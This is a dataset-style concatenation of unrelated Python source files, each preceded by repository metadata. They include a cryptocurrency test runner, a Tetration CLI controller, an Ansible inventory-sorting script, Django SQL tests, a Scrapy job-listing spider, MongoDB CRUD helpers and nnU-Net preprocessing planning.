# Longest test should go first, to favor running tests in parallel
'feature_pruning.py',
'feature_dbcrash.py',
]
# Place EXTENDED_SCRIPTS first since it has the 3 longest running tests
ALL_SCRIPTS = EXTENDED_SCRIPTS + BASE_SCRIPTS
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
def main():
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0, metavar='n', help='On failure, print a log (of length n lines) to the console, combined from the test framework and all test nodes.')
parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface')
parser.add_argument('--ci', action='store_true', help='Run checks and code that are usually only enabled in a continuous integration environment')
parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests')
parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.')
parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true', help='only print dots, results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--failfast', action='store_true', help='stop execution after the first test failure')
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile, encoding="utf8"))
passon_args.append("--configfile=%s" % configfile)
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = "%s/test_runner_Ł_🏃_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
os.makedirs(tmpdir)
logging.debug("Temporary test directory at %s" % tmpdir)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
test_list = []
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the ALL_SCRIPTS list. Accept the name with or without .py extension.
tests = [test + ".py" if ".py" not in test else test for test in tests]
for test in tests:
if test in ALL_SCRIPTS:
test_list.append(test)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], test))
elif args.extended:
# Include extended tests
test_list += ALL_SCRIPTS
else:
# Run base tests only
test_list += BASE_SCRIPTS
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
exclude_tests = [test.split('.py')[0] for test in args.exclude.split(',')]
for exclude_test in exclude_tests:
# Remove <test_name>.py and <test_name>.py --arg from the test list
exclude_list = [test for test in test_list if test.split('.py')[0] == exclude_test]
for exclude_item in exclude_list:
test_list.remove(exclude_item)
if not exclude_list:
print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test))
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script (with args removed) and exit.
parser.print_help()
subprocess.check_call([sys.executable, os.path.join(config["environment"]["SRCDIR"], 'test', 'functional', test_list[0].split()[0]), '-h'])
sys.exit(0)
check_script_list(src_dir=config["environment"]["SRCDIR"], fail_on_warn=args.ci)
check_script_prefixes()
if not args.keepcache:
shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True)
run_tests(
test_list=test_list,
src_dir=config["environment"]["SRCDIR"],
build_dir=config["environment"]["BUILDDIR"],
tmpdir=tmpdir,
jobs=args.jobs,
enable_coverage=args.coverage,
args=passon_args,
combined_logs_len=args.combinedlogslen,
failfast=args.failfast,
runs_ci=args.ci,
)
def run_tests(*, test_list, src_dir, build_dir, tmpdir, jobs=1, enable_coverage=False, args=None, combined_logs_len=0, failfast=False, runs_ci):
args = args or []
# Warn if bitcoind is already running (unix only)
try:
if subprocess.check_output(["pidof", "grovcoind"]) is not None:
print("%sWARNING!%s There is already a grovcoind process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = "%s/test/cache" % build_dir
if os.path.isdir(cache_dir):
print("%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir))
tests_dir = src_dir + '/test/functional/'
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug("Initializing coverage directory at %s" % coverage.dir)
else:
coverage = None
if len(test_list) > 1 and jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
#Run Tests
job_queue = TestHandler(
num_tests_parallel=jobs,
tests_dir=tests_dir,
tmpdir=tmpdir,
test_list=test_list,
flags=flags,
timeout_duration=40 * 60 if runs_ci else float('inf'), # in seconds
)
start_time = time.time()
test_results = []
max_len_name = len(max(test_list, key=len))
test_count = len(test_list)
for i in range(test_count):
test_result, testdir, stdout, stderr = job_queue.get_next()
test_results.append(test_result)
done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0])
if test_result.status == "Passed":
logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time))
elif test_result.status == "Skipped":
logging.debug("%s skipped" % (done_str))
else:
print("%s failed, Duration: %s s\n" % (done_str, test_result.time))
print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n')
print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs_args = [sys.executable, os.path.join(tests_dir, 'combine_logs.py'), testdir]
if BOLD[0]:
combined_logs_args += ['--color']
combined_logs, _ = subprocess.Popen(combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
if failfast:
logging.debug("Early exiting after test failure")
break
print_results(test_results, max_len_name, (int(time.time() - start_time)))
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(lambda test_result: test_result.was_successful, test_results))
# This will be a no-op unless failfast is True in which case there may be dangling
# processes which need to be killed.
job_queue.kill_and_join()
sys.exit(not all_passed)
def print_results(test_results, max_len_name, runtime):
results = "\n" + BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n%s | %s | %s s (accumulated) \n" % ("ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: %s s\n" % (runtime)
print(results)
class TestHandler:
"""
Trigger the test scripts passed in via the list.
"""
def __init__(self, *, num_tests_parallel, tests_dir, tmpdir, test_list, flags, timeout_duration):
assert num_tests_parallel >= 1
self.num_jobs = num_tests_parallel
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.timeout_duration = timeout_duration
self.test_list = test_list
self.flags = flags
self.num_running = 0
self.jobs = []
def get_next(self):
while self.num_running < self.num_jobs and self.test_list:
# Add tests
self.num_running += 1
test = self.test_list.pop(0)
portseed = len(self.test_list)
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = test.split()
testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
self.jobs.append((test,
time.time(),
subprocess.Popen([sys.executable, self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr),
testdir,
log_stdout,
log_stderr))
if not self.jobs:
raise IndexError('pop from empty list')
dot_count = 0
while True:
# Return first proc that finishes
time.sleep(.5)
for job in self.jobs:
(name, start_time, proc, testdir, log_out, log_err) = job
if int(time.time() - start_time) > self.timeout_duration:
# In travis, timeout individual tests (to stop tests hanging and not providing useful output).
proc.send_signal(signal.SIGINT)
if proc.poll() is not None:
log_out.seek(0), log_err.seek(0)
[stdout, stderr] = [log_file.read().decode('utf-8') for log_file in (log_out, log_err)]
log_out.close(), log_err.close()
if proc.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif proc.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
self.num_running -= 1
self.jobs.remove(job)
clearline = '\r' + (' ' * dot_count) + '\r'
print(clearline, end='', flush=True)
dot_count = 0
return TestResult(name, status, int(time.time() - start_time)), testdir, stdout, stderr
print('.', end='', flush=True)
dot_count += 1
def kill_and_join(self):
"""Send SIGKILL to all jobs and block until all have ended."""
procs = [i[2] for i in self.jobs]
for proc in procs:
proc.kill()
for proc in procs:
proc.wait()
class TestResult():
def __init__(self, name, status, time):
self.name = name
self.status = status
self.time = time
self.padding = 0
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = GREEN
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "%s | %s%s | %s s\n" % (self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def check_script_prefixes():
"""Check that test scripts start with one of the allowed name prefixes."""
good_prefixes_re = re.compile("(example|feature|interface|mempool|mining|p2p|rpc|wallet|tool)_")
bad_script_names = [script for script in ALL_SCRIPTS if good_prefixes_re.match(script) is None]
if bad_script_names:
print("%sERROR:%s %d tests not meeting naming conventions:" % (BOLD[1], BOLD[0], len(bad_script_names)))
print(" %s" % ("\n ".join(sorted(bad_script_names))))
raise AssertionError("Some tests are not following naming convention!")
def check_script_list(*, src_dir, fail_on_warn):
"""Check scripts directory.
Check that there are no scripts in the functional tests directory which are
not being run by pull-tester.py."""
script_dir = src_dir + '/test/functional/'
python_files = set([test_file for test_file in os.listdir(script_dir) if test_file.endswith(".py")])
missed_tests = list(python_files - set(map(lambda x: x.split()[0], ALL_SCRIPTS + NON_SCRIPTS)))
if len(missed_tests) != 0:
print("%sWARNING!%s The following scripts are not being run: %s. Check the test lists in test_runner.py." % (BOLD[1], BOLD[0], str(missed_tests)))
if fail_on_warn:
# On travis this warning is an error to prevent merging incomplete commits into master
sys.exit(1)
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `grovcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir=%s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % command) for command in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as coverage_ref_file:
all_cmds.update([line.strip() for line in coverage_ref_file.readlines()])
for root, _, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as coverage_file:
covered_cmds.update([line.strip() for line in coverage_file.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
main()
| 38.892473 | 205 | 0.632331 |
0ecd8c994118cadaf94a9df739e370cc033a4278 | 1,124 | py | Python | tetrationcli/controllers/applications.py | jumolinas/tetrationcli | 41605403734ab1e2256b01f438bf9172288fa912 | [
"MIT"
] | 4 | 2018-11-28T13:37:59.000Z | 2019-03-29T03:02:27.000Z | tetrationcli/controllers/applications.py | jumolinas/tetrationcli | 41605403734ab1e2256b01f438bf9172288fa912 | [
"MIT"
] | 5 | 2018-12-07T13:06:35.000Z | 2019-12-13T15:32:51.000Z | tetrationcli/controllers/applications.py | jumolinas/tetrationcli | 41605403734ab1e2256b01f438bf9172288fa912 | [
"MIT"
] | null | null | null | from cement import ex
from .tet_controller import TetController
import json
class Applications(TetController):
class Meta:
label = 'applications'
stacked_type = 'nested'
help= 'Interact with ADM Application from Tetration Cluster'
@ex(help='list applications', arguments=[
])
def list(self):
"""
Return the list of all the applications
"""
response = self.tetration().get('/applications')
content = json.loads(response.content.decode("utf-8"))
self.app.log.debug('{0} - {1}'.format(response.status_code,
response.content.decode('utf-8')))
if response.status_code == 403:
self.app.log.error('{0}Request "app_policy_management" permissions'.format(response.content.decode('utf-8')))
return
headers = ['Application ID', 'Name', 'Scope ID']
data_list = [[x['id'],
x['name'],
x['app_scope_id']] for x in content ]
self.app.render(data_list, headers=headers)
| 33.058824 | 121 | 0.564057 |
b108f4c8311348698a4b16524190d4e54ef654d2 | 2,572 | py | Python | extra/up_inv.py | HeyLazySunnyKid/HeyCheckYourRights | acecff3a41049bc85a88a2d55664afe44e1b4757 | [
"MIT"
] | null | null | null | extra/up_inv.py | HeyLazySunnyKid/HeyCheckYourRights | acecff3a41049bc85a88a2d55664afe44e1b4757 | [
"MIT"
] | null | null | null | extra/up_inv.py | HeyLazySunnyKid/HeyCheckYourRights | acecff3a41049bc85a88a2d55664afe44e1b4757 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import re
import shutil
import os
"""
Вспомогательный скрипт для переноса хоста из одной инвентори группы в другую в
рамках сортировки хостов.
Input: up_inv.py <inventory> <hostname> <ping> <setup> <sudo>
<inventory> - path to inventory file
<hostname> - checked hostname
<ping> - ping is ok (boolean)
<setup> - ansible setup is ok? (boolean)
<sudo> - ansible become is ok? (boolean)
"""
def move_host(inv, host, block):
mode = 'r' if os.path.exists(inv) else 'w+'
with open(inv, mode) as r:
with open('tempfile', 'w') as w:
cur_block = None
host_not_found = True
host_writed = False
file_changed = False
for line in r:
block_match = re.match(r'\[(.*)\]', line)
if block_match:
# Если полностью прошли нужный блок и не нашли хост то
# добавляем в конец блока
if cur_block == block and host_not_found:
w.write(host+'\n')
host_writed = True
file_changed = True
cur_block = block_match.group(1)
w.write(line)
continue
host_match = re.match(host, line)
if host_match:
if cur_block == block:
host_not_found = False
host_writed = True
elif cur_block in ['unreachable', 'ping', 'reachable', 'best']:
# Не вставлять хост если не тот блок из зарезирвированных
file_changed = True
continue
w.write(line)
if not host_writed:
# Если прошли весь файл и не нашли нужный блок, то нужно его
# добавить
if cur_block != block:
w.write('['+block+']\n')
w.write(host+'\n')
host_writed = True
file_changed = True
shutil.move('tempfile', inv)
if file_changed:
print('changed')
def main():
# print(sys.argv)
inv = sys.argv[1]
host = sys.argv[2]
false_list = ['False', 'false', 'f']
if sys.argv[3] in false_list:
block = 'unreachable'
elif sys.argv[4] in false_list:
block = 'ping'
elif sys.argv[5] in false_list:
block = 'reachable'
else:
block = 'best'
move_host(inv, host, block)
if __name__ == "__main__":
main()
| 27.655914 | 83 | 0.512442 |
597f68e74e0d296d5114aab7ec07e3239539f6ea | 2,609 | py | Python | djaludir/core/tests/sql/test_address.py | carthagecollege/django-djaludir | 126735000efb69d7184aec9591a96667070f1870 | [
"BSD-3-Clause"
] | null | null | null | djaludir/core/tests/sql/test_address.py | carthagecollege/django-djaludir | 126735000efb69d7184aec9591a96667070f1870 | [
"BSD-3-Clause"
] | 2 | 2020-06-05T19:30:19.000Z | 2021-06-10T20:54:38.000Z | djaludir/core/tests/sql/test_address.py | carthagecollege/django-djaludir | 126735000efb69d7184aec9591a96667070f1870 | [
"BSD-3-Clause"
] | null | null | null | from django.conf import settings
from django.test import TestCase
from djaludir.core.sql import HOMEADDRESS_TEMP, WORKADDRESS_TEMP
from djtools.utils.logging import seperator
from djzbar.utils.informix import do_sql
class ManagerAddressTestCase(TestCase):
def setUp(self):
self.debug = settings.INFORMIX_DEBUG
self.earl = settings.INFORMIX_EARL
self.cid = settings.TEST_USER_COLLEGE_ID
self.cid_null = 666
def test_home_address_temp(self):
print("\n")
print("test home address select statement from temp table")
print(seperator())
sql = HOMEADDRESS_TEMP(cid = self.cid)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print HOMEADDRESS_TEMP SQL")
homeaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(homeaddress)
self.assertGreaterEqual(len(homeaddress), 1)
def test_home_address_invalid(self):
print("\n")
print(
"""
test home address select statement from temp table
with invalid college ID
"""
)
print(seperator())
sql = HOMEADDRESS_TEMP(cid = self.cid_null)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print HOMEADDRESS_TEMP SQL")
homeaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(homeaddress)
self.assertEqual(len(homeaddress), 0)
def test_work_address_temp(self):
print("\n")
print("test work address select statement from temp table")
print(seperator())
sql = WORKADDRESS_TEMP(cid = self.cid)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print WORKADDRESS_TEMP SQL")
workaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(workaddress)
self.assertGreaterEqual(len(workaddress), 1)
def test_work_address_invalid(self):
print("\n")
print(
"""
test work address select statement from temp table
with invalid college ID
"""
)
print(seperator())
sql = WORKADDRESS_TEMP(cid = self.cid_null)
if settings.DEBUG:
print(sql)
else:
print("use the --debug-mode flag to print WORKADDRESS_TEMP SQL")
workaddress = do_sql(sql, self.debug, self.earl).fetchall()
print(workaddress)
self.assertEqual(len(workaddress), 0)
| 25.330097 | 76 | 0.609046 |
d2a2c81039574c4e8e166844aeb70fb9e2797f9c | 1,506 | py | Python | TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py | han8909227/python_mid_project | 6319f694de070860f814d0b9dfc04afe060134fb | [
"MIT"
] | null | null | null | TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py | han8909227/python_mid_project | 6319f694de070860f814d0b9dfc04afe060134fb | [
"MIT"
] | 3 | 2019-12-26T16:39:11.000Z | 2021-03-31T18:40:46.000Z | TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py | han8909227/python_mid_project | 6319f694de070860f814d0b9dfc04afe060134fb | [
"MIT"
] | 2 | 2017-11-17T01:19:38.000Z | 2018-09-06T18:43:40.000Z | import scrapy
from scrapy import Request
from TechLurker.scripts.my_scraper.my_scraper.items import RecruitItem
class PyjobSpider_detail(scrapy.Spider):
name = "pyjobd"
allowed_domains = ["python.org"]
start_urls = ["https://www.python.org/jobs/"]
def parse(self, response):
jobs = response.xpath('//ol/li')
for job in jobs:
relative_url = job.xpath('h2/span/a/@href').extract_first()
absolute_url = response.urljoin(relative_url)
title = job.xpath('h2/span/a/text()').extract()[0]
address = job.xpath('h2/span/a/text()').extract()[1]
job_type = job.xpath('span/a/text()').extract()
# company = job.xpath('h2/span/text()').extract()
yield Request(absolute_url, callback=self.parse_page, meta={'URL': absolute_url, 'Title': title, 'Loc': address, 'JobType': job_type})
relative_next_url = response.xpath('//a[contains(@href, "?page=")]/@href')[-1].extract()
absolute_next_url = "https://www.python.org/jobs/" + relative_next_url
yield Request(absolute_next_url, callback=self.parse)
def parse_page(self, response):
item = RecruitItem()
item['url'] = response.meta.get('URL')
item['title'] = response.meta.get('Title')
item['loc'] = response.meta.get('Loc')
item['job_type'] = response.meta.get('JobType')
item['descrip'] = response.xpath('//div[@class="job-description"]/p/text()').extract()
yield item
| 45.636364 | 146 | 0.626826 |
2acd9770cb62478b5a7c4b09ca9b29eae334cd84 | 1,614 | py | Python | backend/db.py | LucioGrimaldi/SimpleFastPythonAPISample | f880d8e9c772c3f09d53ea34ea3478fbaa72da8a | [
"Apache-2.0"
] | null | null | null | backend/db.py | LucioGrimaldi/SimpleFastPythonAPISample | f880d8e9c772c3f09d53ea34ea3478fbaa72da8a | [
"Apache-2.0"
] | null | null | null | backend/db.py | LucioGrimaldi/SimpleFastPythonAPISample | f880d8e9c772c3f09d53ea34ea3478fbaa72da8a | [
"Apache-2.0"
] | null | null | null | from typing import Collection
from model import Employee
import motor.motor_asyncio #MongoDB driver
client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://localhost:27017')
database = client.Employees
collection = database.employees
async def get_employees_by_key_value(key, value):
employees = []
cursor = collection.find({key:value})
async for document in cursor:
employees.append(Employee(**document))
return employees
async def get_all_employees():
employees = []
cursor = collection.find({})
async for document in cursor:
employees.append(Employee(**document))
return employees
async def create_employee(employee):
await collection.insert_one(employee)
return employee
async def update_employee_phone_number(id, phone_number):
await collection.update_one({'id':id},
{'$set': {'phone_number':phone_number}})
document = await collection.find_one({'phone_number':phone_number})
return document
async def update_employee_address(id, new_address):
await collection.update_one({'id':id},
{'$set': {'address':new_address}})
document = await collection.find_one({'address':new_address})
return document
async def remove_employee_by_name(name):
result = await collection.delete_one({'name':name})
if result.deleted_count == 1:
return True
else:
return False
async def remove_employee_by_id(id):
result = await collection.delete_one({'id':id})
if result.deleted_count == 1:
return True
else:
return False | 31.038462 | 76 | 0.69145 |
d679487e365d01e5ff07163cbbe23ccd19a0bd2e | 7,068 | py | Python | nnunet/experiment_planning/nnUNet_plan_and_preprocess.py | Jiawei-Yang/TumorCP | 6053c75642fcbc0fb0424320ab3d758f24883b0e | [
"Apache-2.0"
] | 12 | 2021-07-22T15:08:13.000Z | 2022-03-10T08:15:56.000Z | nnunet/experiment_planning/nnUNet_plan_and_preprocess.py | Jiawei-Yang/TumorCP | 6053c75642fcbc0fb0424320ab3d758f24883b0e | [
"Apache-2.0"
] | null | null | null | nnunet/experiment_planning/nnUNet_plan_and_preprocess.py | Jiawei-Yang/TumorCP | 6053c75642fcbc0fb0424320ab3d758f24883b0e | [
"Apache-2.0"
] | 3 | 2021-11-26T06:26:24.000Z | 2022-02-14T01:23:44.000Z | # Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
sys.path.append('../..')
import nnunet
from batchgenerators.utilities.file_and_folder_operations import *
from nnunet.experiment_planning.DatasetAnalyzer import DatasetAnalyzer
from nnunet.experiment_planning.utils import crop
from nnunet.paths import *
import shutil
from nnunet.utilities.task_name_id_conversion import convert_id_to_task_name
from nnunet.preprocessing.sanity_checks import verify_dataset_integrity
from nnunet.training.model_restore import recursive_find_python_class
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--task_ids", nargs="+", help="List of integers belonging to the task ids you wish to run"
" experiment planning and preprocessing for. Each of these "
"ids must, have a matching folder 'TaskXXX_' in the raw "
"data folder")
parser.add_argument("-pl3d", "--planner3d", type=str, default="ExperimentPlanner3D_v21",
help="Name of the ExperimentPlanner class for the full resolution 3D U-Net and U-Net cascade. "
"Default is ExperimentPlanner3D_v21. Can be 'None', in which case these U-Nets will not be "
"configured")
parser.add_argument("-pl2d", "--planner2d", type=str, default="ExperimentPlanner2D_v21",
help="Name of the ExperimentPlanner class for the 2D U-Net. Default is ExperimentPlanner2D_v21. "
"Can be 'None', in which case this U-Net will not be configured")
parser.add_argument("-no_pp", action="store_true",
help="Set this flag if you dont want to run the preprocessing. If this is set then this script "
"will only run the experiment planning and create the plans file")
parser.add_argument("-tl", type=int, required=False, default=8,
help="Number of processes used for preprocessing the low resolution data for the 3D low "
"resolution U-Net. This can be larger than -tf. Don't overdo it or you will run out of "
"RAM")
parser.add_argument("-tf", type=int, required=False, default=8,
help="Number of processes used for preprocessing the full resolution data of the 2D U-Net and "
"3D U-Net. Don't overdo it or you will run out of RAM")
parser.add_argument("--verify_dataset_integrity", required=False, default=False, action="store_true",
help="set this flag to check the dataset integrity. This is useful and should be done once for "
"each dataset!")
args = parser.parse_args()
task_ids = args.task_ids
dont_run_preprocessing = args.no_pp
tl = args.tl
tf = args.tf
planner_name3d = args.planner3d
planner_name2d = args.planner2d
if planner_name3d == "None":
planner_name3d = None
if planner_name2d == "None":
planner_name2d = None
# we need raw data
tasks = []
for i in task_ids:
i = int(i)
task_name = convert_id_to_task_name(i)
if args.verify_dataset_integrity:
verify_dataset_integrity(join(nnUNet_raw_data, task_name))
crop(task_name, False, tf)
tasks.append(task_name)
search_in = join(nnunet.__path__[0], "experiment_planning")
if planner_name3d is not None:
planner_3d = recursive_find_python_class([search_in], planner_name3d, current_module="nnunet.experiment_planning")
if planner_3d is None:
raise RuntimeError("Could not find the Planner class %s. Make sure it is located somewhere in "
"nnunet.experiment_planning" % planner_name3d)
else:
planner_3d = None
if planner_name2d is not None:
planner_2d = recursive_find_python_class([search_in], planner_name2d, current_module="nnunet.experiment_planning")
if planner_2d is None:
raise RuntimeError("Could not find the Planner class %s. Make sure it is located somewhere in "
"nnunet.experiment_planning" % planner_name2d)
else:
planner_2d = None
for t in tasks:
print("\n\n\n", t)
cropped_out_dir = os.path.join(nnUNet_cropped_data, t)
preprocessing_output_dir_this_task = os.path.join(preprocessing_output_dir, t)
#splitted_4d_output_dir_task = os.path.join(nnUNet_raw_data, t)
#lists, modalities = create_lists_from_splitted_dataset(splitted_4d_output_dir_task)
# we need to figure out if we need the intensity propoerties. We collect them only if one of the modalities is CT
dataset_json = load_json(join(cropped_out_dir, 'dataset.json'))
modalities = list(dataset_json["modality"].values())
collect_intensityproperties = True if (("CT" in modalities) or ("ct" in modalities)) else False
dataset_analyzer = DatasetAnalyzer(cropped_out_dir, overwrite=False, num_processes=tf) # this class creates the fingerprint
_ = dataset_analyzer.analyze_dataset(collect_intensityproperties) # this will write output files that will be used by the ExperimentPlanner
maybe_mkdir_p(preprocessing_output_dir_this_task)
shutil.copy(join(cropped_out_dir, "dataset_properties.pkl"), preprocessing_output_dir_this_task)
shutil.copy(join(nnUNet_raw_data, t, "dataset.json"), preprocessing_output_dir_this_task)
threads = (tl, tf)
print("number of threads: ", threads, "\n")
if planner_3d is not None:
exp_planner = planner_3d(cropped_out_dir, preprocessing_output_dir_this_task)
exp_planner.plan_experiment()
if not dont_run_preprocessing: # double negative, yooo
exp_planner.run_preprocessing(threads)
if planner_2d is not None:
exp_planner = planner_2d(cropped_out_dir, preprocessing_output_dir_this_task)
exp_planner.plan_experiment()
if not dont_run_preprocessing: # double negative, yooo
exp_planner.run_preprocessing(threads)
if __name__ == "__main__":
main()
| 49.426573 | 148 | 0.664261 |
8ec9f0df25d86c7a24a57c648be6eb76f416443d | 1,757 | py | Python | bin/syncdb.py | srvz/zkdash | f705c72983694bb6437cb2c2e2cdb72122d151d1 | [
"Apache-2.0"
] | null | null | null | bin/syncdb.py | srvz/zkdash | f705c72983694bb6437cb2c2e2cdb72122d151d1 | [
"Apache-2.0"
] | null | null | null | bin/syncdb.py | srvz/zkdash | f705c72983694bb6437cb2c2e2cdb72122d151d1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (c) 2014,掌阅科技
All rights reserved.
摘 要: syncdb.py
创 建 者: zhuangshixiong
创建日期: 2015-10-10
'''
# pylint: disable=import-error, unused-variable, protected-access
import sys
import os
import pkgutil
sys.path.append(os.path.dirname(os.path.split(os.path.realpath(__file__))[0]))
import model.db
from model.db.base import ZKDASH_DB
from lib.utils import find_subclasses
def sync_db():
"""sync db
"""
# firstly, import all modules of model.db package
prefix = model.db.__name__ + "."
